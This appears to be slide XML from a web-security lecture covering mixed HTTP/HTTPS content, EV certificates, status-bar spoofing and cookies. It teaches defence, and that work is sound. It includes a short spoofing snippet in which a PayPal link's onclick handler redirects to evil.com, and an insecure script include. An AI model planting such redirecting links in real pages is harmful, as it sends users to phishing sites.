            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flash files over HTTP loaded with no warning  (!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note:   Flash can script the embedding page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firefox:   red slash over lock icon (no dialog)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flash files over HTTP do not trigger the slash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Safari: does not detect mixed content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6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8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Mixed Content:  HTTP and HTTPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1400840" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="33594" t="37500" r="32813" b="40625"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="1752600"/>
            <a:ext cx="3276600" cy="1600200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  <a:effectLst/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2438400" y="4038600"/>
            <a:ext cx="7239000" cy="2133600"/>
            <a:chOff x="576" y="1152"/>
            <a:chExt cx="4560" cy="1344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1400836" name="Picture 2" descr="D:\HOME\abarth\svn\papers\https\screenshots\origin-contamination.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect t="55110"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="576" y="1152"/>
              <a:ext cx="4560" cy="1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00841" name="Oval 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3497" y="1440"/>
              <a:ext cx="336" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="76200" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="none" w="lg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0842" name="Oval 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1584" y="1451"/>
              <a:ext cx="428" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="76200" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="none" w="lg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6554788" y="1611314"/>
            <a:ext cx="3395662" cy="1741487"/>
            <a:chOff x="3169" y="916"/>
            <a:chExt cx="2139" cy="1097"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1400844" name="Picture 12" descr="unspecifiedSecurityflaw"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:srcRect l="42221" t="47212"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3169" y="1104"/>
              <a:ext cx="2139" cy="909"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1400848" name="Text Box 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3638" y="916"/>
              <a:ext cx="787" cy="23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silly dialogs</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11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53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157" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2488304" y="2461410"/>
            <a:ext cx="7350125" cy="463550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="38100" algn="ctr">
            <a:noFill/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7156" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2569236" y="4609382"/>
            <a:ext cx="7239000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="38100" algn="ctr">
            <a:noFill/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04800"/>
            <a:ext cx="8229600" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Mixed content and network attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14571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133600" y="1524000"/>
            <a:ext cx="7760898" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>banks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>login all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developer error:     Somewhere on bank site write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://www.site.com/script.js&gt; &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active network attacker can now hijack any session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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/>
              <a:t>Better way to include content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=//www.site.com/script.js&gt; &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>served </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>over the same protocol as embedding page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50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715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 Icon 2.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13967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2362200" y="1101316"/>
            <a:ext cx="8001000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="sng" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Extended validation (EV) certs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="굴림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ko-KR" dirty="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1396740" name="Picture 2" descr="D:\HOME\abarth\svn\papers\https\screenshots\ev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0776" y="2015717"/>
            <a:ext cx="7515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96741" name="Object 5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46341615"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2438400" y="3088866"/>
          <a:ext cx="73914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Image" r:id="rId4" imgW="8101587" imgH="1079365" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId4" imgW="8101587" imgH="107936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088866"/>
                        <a:ext cx="739140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6745" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2298701" y="4639854"/>
            <a:ext cx="6957995" cy="1200329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 Prominent security indicator for  EV  certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>note:  EV site loading content from non-EV site does</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	   not trigger mixed content warning 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55720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Finally:   the status Bar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13844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2362200" y="1524000"/>
            <a:ext cx="8305800" cy="5257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altLang="ko-KR" dirty="0">
              <a:ea typeface="굴림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ko-KR" dirty="0">
              <a:ea typeface="굴림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ko-KR" dirty="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Trivially </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>spoofable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>=“http://www.paypal.com/”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>	        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>this.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> = ‘http://www.evil.com/’;”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>     PayPal&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128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2362200" y="1905000"/>
            <a:ext cx="6477000" cy="762000"/>
            <a:chOff x="528" y="1200"/>
            <a:chExt cx="4080" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1384456" name="Picture 8"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:srcRect t="87500" r="36719" b="4167"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="720" y="1200"/>
              <a:ext cx="3888" cy="38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</p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1384457" name="AutoShape 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="528" y="1344"/>
              <a:ext cx="2688" cy="336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chemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="none" w="lg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30013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Cookies:   client state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09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ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{21B46397-9ABA-41D2-BBEA-0C987D291BDA}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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2400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186" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828801" y="855454"/>
            <a:ext cx="2157413" cy="53340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3187" name="Rectangle 3"/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7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373188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362200" y="855454"/>
            <a:ext cx="8001000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Used to store state on user’s machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373189" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971801" y="1557129"/>
            <a:ext cx="1128713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3190" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3071813" y="1657142"/>
            <a:ext cx="914400" cy="60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>
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373191" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2395329"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 1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3192" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2623929"/>
            <a:ext cx="1143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3193" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3714750" y="2390567"/>
            <a:ext cx="400050" cy="385762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="252" y="81"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="249" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="147"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="252" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243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373194" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="1480929"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 2607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sz="2400">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373195" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="1938129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373196" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5253371" y="1465054"/>
            <a:ext cx="8835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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373197" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="2166729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373198" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="2227055"/>
            <a:ext cx="4800600" cy="169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  <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Header: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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set-cookie:	NAME=VALUE ;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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	domain = (who can read) ;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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	expires = (when expires) ;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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	secure = (only over SSL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373199" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971801" y="4589254"/>
            <a:ext cx="1128713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3200" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3071813" y="4689267"/>
            <a:ext cx="914400" cy="60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>
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373201" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="5427454"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 1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3202" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="5656054"/>
            <a:ext cx="1143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3203" name="Freeform 19"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3714750" y="5422692"/>
            <a:ext cx="400050" cy="385762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="252" y="81"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="249" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="147"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="243"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="252" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243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373204" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="4513054"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 2607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sz="2400">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373205" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="4840079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373206" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
